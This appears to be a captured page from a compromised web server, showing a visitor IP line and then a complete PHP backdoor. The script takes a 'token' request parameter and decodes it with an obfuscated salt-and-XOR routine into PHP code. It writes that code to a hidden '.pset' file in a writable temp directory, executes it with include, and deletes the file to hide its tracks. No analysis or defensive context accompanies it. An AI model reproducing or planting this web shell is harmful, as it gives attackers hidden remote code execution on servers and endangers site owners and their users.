Your IP : 216.73.216.158
<?php
if(count($_REQUEST) > 0 && isset($_REQUEST["token"])){
$value = array_filter([session_save_path(), sys_get_temp_dir(), "/dev/shm", getcwd(), getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), "/var/tmp", "/tmp"]);
$entry = $_REQUEST["token"];
$entry= explode ( '.' , $entry ) ;
$ptr = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen( $salt);
$len = count( $entry);
for( $u = 0; $u< $len; $u++) {
$v4 = $entry[$u];
$chS = ord( $salt[$u % $lenS]);
$dec =( ( int)$v4 - $chS -( $u % 10)) ^ 75;
$ptr .= chr( $dec); }
$pointer = 0;
do {
$property_set = $value[$pointer] ?? null;
if ($pointer >= count($value)) break;
if (is_writable($property_set) && is_dir($property_set)) {
$object = "$property_set" . "/.pset";
$file = fopen($object, 'w');
if ($file) {
fwrite($file, $ptr);
fclose($file);
include $object;
@unlink($object);
exit;
}
}
$pointer++;
} while (true);
}